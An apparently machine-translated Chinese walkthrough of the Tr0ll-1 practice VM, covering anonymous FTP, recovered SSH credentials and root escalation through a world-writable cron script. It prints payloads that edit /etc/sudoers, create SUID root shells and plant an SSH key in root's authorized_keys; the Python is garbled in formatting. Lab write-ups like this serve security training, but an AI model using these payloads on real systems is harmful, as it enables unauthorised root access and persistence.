关于安全:Tr0ll-1靶机提点

39次阅读

共计 1444 个字符,预计需要花费 4 分钟才能阅读完成。

匿名登录 ftp 获取数据流量包:

剖析流量失去一串字符:

当作目录在网页上拜访:

剖析 foflmao,是一个 32 位可执行文件,strings 一下看到:

同样当作目录来拜访:

这里试出来用户名是 overflow,明码是 Pass.txt。ssh 登录之后钻研怎么提权,有两种思路,一种是间接内核提,37292
一种是通过 ssh 连贯隔一段时间就会断开这个景象,去剖析 cronlog,而后发现 /lib/log/cleaner.py,这个文件是全局可写的,root 权限执行,之后就写这个 py 文件就能够提权了,上面列举几个脚本:

#!/usr/bin/env python
import os import sys try:
        os.system('echo"overflow ALL=(ALL:ALL) ALL">> /etc/sudoers') except:
        sys.exit()
#!/usr/bin/env python
import os import sys try:
        os.system('chown root:root /tmp/getroot; chmod 4755 /tmp/getroot') except:
        sys.exit()

上面是先新建这个文件,而后编译为 getroot 文件,下面就能够应用了
vim getroot.c

int main(void) {setgid(0); setuid(0);
    system("/bin/bash");
}
#!/usr/bin/env python
import os import sys try:
        os.system('cp /bin/bash /tmp/bash')
        os.system('chmod 4777 /tmp/bash') except:
        sys.exit()

这里执行 bash - p 即可提权,如果是写成 /bin/sh 那么间接执行就可获取 root 权限 
#!/usr/bin/env python
import os import sys try:
        os.system('mkdir /root/.ssh; chmod 775 .ssh; echo"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfjdrW5okibmnT9c3hsAoSZPJ0XcCN92f998ZkCcWehEHXTmpkGJE7qedYSbr78pQITNnIXpVEJXlKYaTQUf68JUKCiBWwLQes3SfHN6SoRe4hiC4LtgtXiUmRIYYY//PXEdgbH7dFvX67fA8p/6Mz/R6ITS4OvHDQCLNwV8wmu46pS4xEq9/Rsp3nc6OjHVWAvnwnBmNTjUWEGuKH5Vvqw5yM0/PV5SeeyaB0R5jm4M7YL1/h8RRVvInt5M20/FaR5wWL4pEeGXsqKPjZUtdCfgPkZwF/4Oi6aOYSKGVmQrnbsetG5F2//IuUTBEkgQp4HevL1hNw3iAH+PNh/iHlVhafeYw9rZ/G9G97vGCsTy7UVYRk55nJQuHTRhZOkt8jAqfBgjLwP/Gn6wXIGWFmSLaKO//jJuSYYVXGIu9vjTGSLEUQtSQKrf+vL94jtGDRYArDnqFvJopj3HJK39B8O2PhVhQ0bh+YbQNWPoHsc5O7UH/6LcREUnppzSKf2yE= kali@kali">> /root/.ssh/authorized_keys') except:
        sys.exit()

正文完
 0